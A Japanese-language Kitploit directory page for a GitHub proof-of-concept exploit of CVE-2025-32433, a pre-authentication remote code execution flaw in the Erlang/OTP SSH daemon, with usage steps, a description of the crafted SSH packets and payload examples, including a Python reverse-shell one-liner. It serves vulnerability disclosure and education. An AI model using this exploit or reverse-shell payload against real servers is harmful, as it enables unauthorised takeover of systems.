Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32433 — CVE-2025-32433の概念実証エクスプロイト。Erlang/OTP SSHデーモンにおける事前認証RCEです。細工されたSSHチャネルリクエストを送信し、任意のコマンドを実行するPythonスクリプトを含みます。 | Kitploit
ツール/GitHubGitHub/mdusmandasthaheer/cve-2025-32433
脆弱性分析エクスプロイトペネトレーションテスト学習と教育リモートアクセスツールペイロード開発
GitHubmdusmandasthaheer/cve-2025-32433

CVE-2025-32433

CVE-2025-32433の概念実証エクスプロイト。Erlang/OTP SSHデーモンにおける事前認証RCEです。細工されたSSHチャネルリクエストを送信し、任意のコマンドを実行するPythonスクリプトを含みます。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32433 – Erlang/OTP SSH RCE 脆弱性

📌 概要

CVE-2025-32433 は、Erlang/OTP SSH デーモンに影響を与える リモートコード実行 (RCE) 脆弱性です。 根本的な原因は、認証前の SSH チャネルリクエストの不適切な処理にあり、攻撃者がこれを細工することで、 認証前に任意のコマンド実行を引き起こす可能性があります。 添付の PoC は、このような細工された SSH パケットを送信することを示しています。デフォルトではターゲット上に /lab.txt を作成しますが、他のコマンドに応用可能です。

⚠️ 免責事項: このリポジトリは 教育および研究目的のみ です。 明示的な許可なくシステムに対して使用しないでください。

🛠️ 使用方法

  1. PoC スクリプトでターゲットの詳細を編集します:
root@kitploit:~
HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
  1. エクスプロイトを実行します:
root@kitploit:~
python3 cve-2025-32433.py

デフォルトでは pwned を含む /lab.txt を作成します。 build_channel_request 内のペイロードを変更して、独自のコマンドを実行してください。

🧩 ペイロード例

root@kitploit:~
# Write a file
file:write_file("/lab.txt", <<"pwned">>).

Spawn a reverse shell

os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")

🔧 PoC の仕組み (簡略)

  • SSH サービスに接続し、バナーを交換します。
  • 通常のハンドシェイクのように見せかけた細工された SSH_MSG_KEXINIT を送信します。
  • 認証前に exec ペイロードを含む SSH_MSG_CHANNEL_OPEN と SSH_MSG_CHANNEL_REQUEST を送信します。
  • 脆弱な場合、サーバは指定された Erlang コマンドを実行します。

🙏 クレジット

発見と報告は Matt Keeley (Platform Security) によるものです。 PoC を公開して詳細を共有してくれたことに感謝します。

ブログリンク: https://platformsecurity.com/blog/CVE-2025-32433-poc

📚 参考文献

  • Matt Keeley のブログ
  • Erlang/OTP セキュリティアドバイザリ
  • MITRE CVE レコード
ツールをダウンロード